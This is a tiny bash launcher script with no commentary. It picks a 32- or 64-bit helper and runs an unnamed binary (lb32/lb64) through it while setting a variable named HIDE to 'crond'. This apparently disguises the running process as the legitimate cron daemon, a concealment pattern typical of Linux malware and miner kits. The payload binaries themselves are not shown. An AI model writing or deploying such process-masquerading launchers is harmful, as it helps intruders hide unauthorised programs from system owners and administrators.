#!/bin/bash ARCH=`uname -m` HIDE="crond" if [ "$ARCH" == "i686" ]; then ./h32 -s $HIDE ./lb32 elif [ "$ARCH" == "x86_64" ]; then ./h64 -s $HIDE ./lb64 fi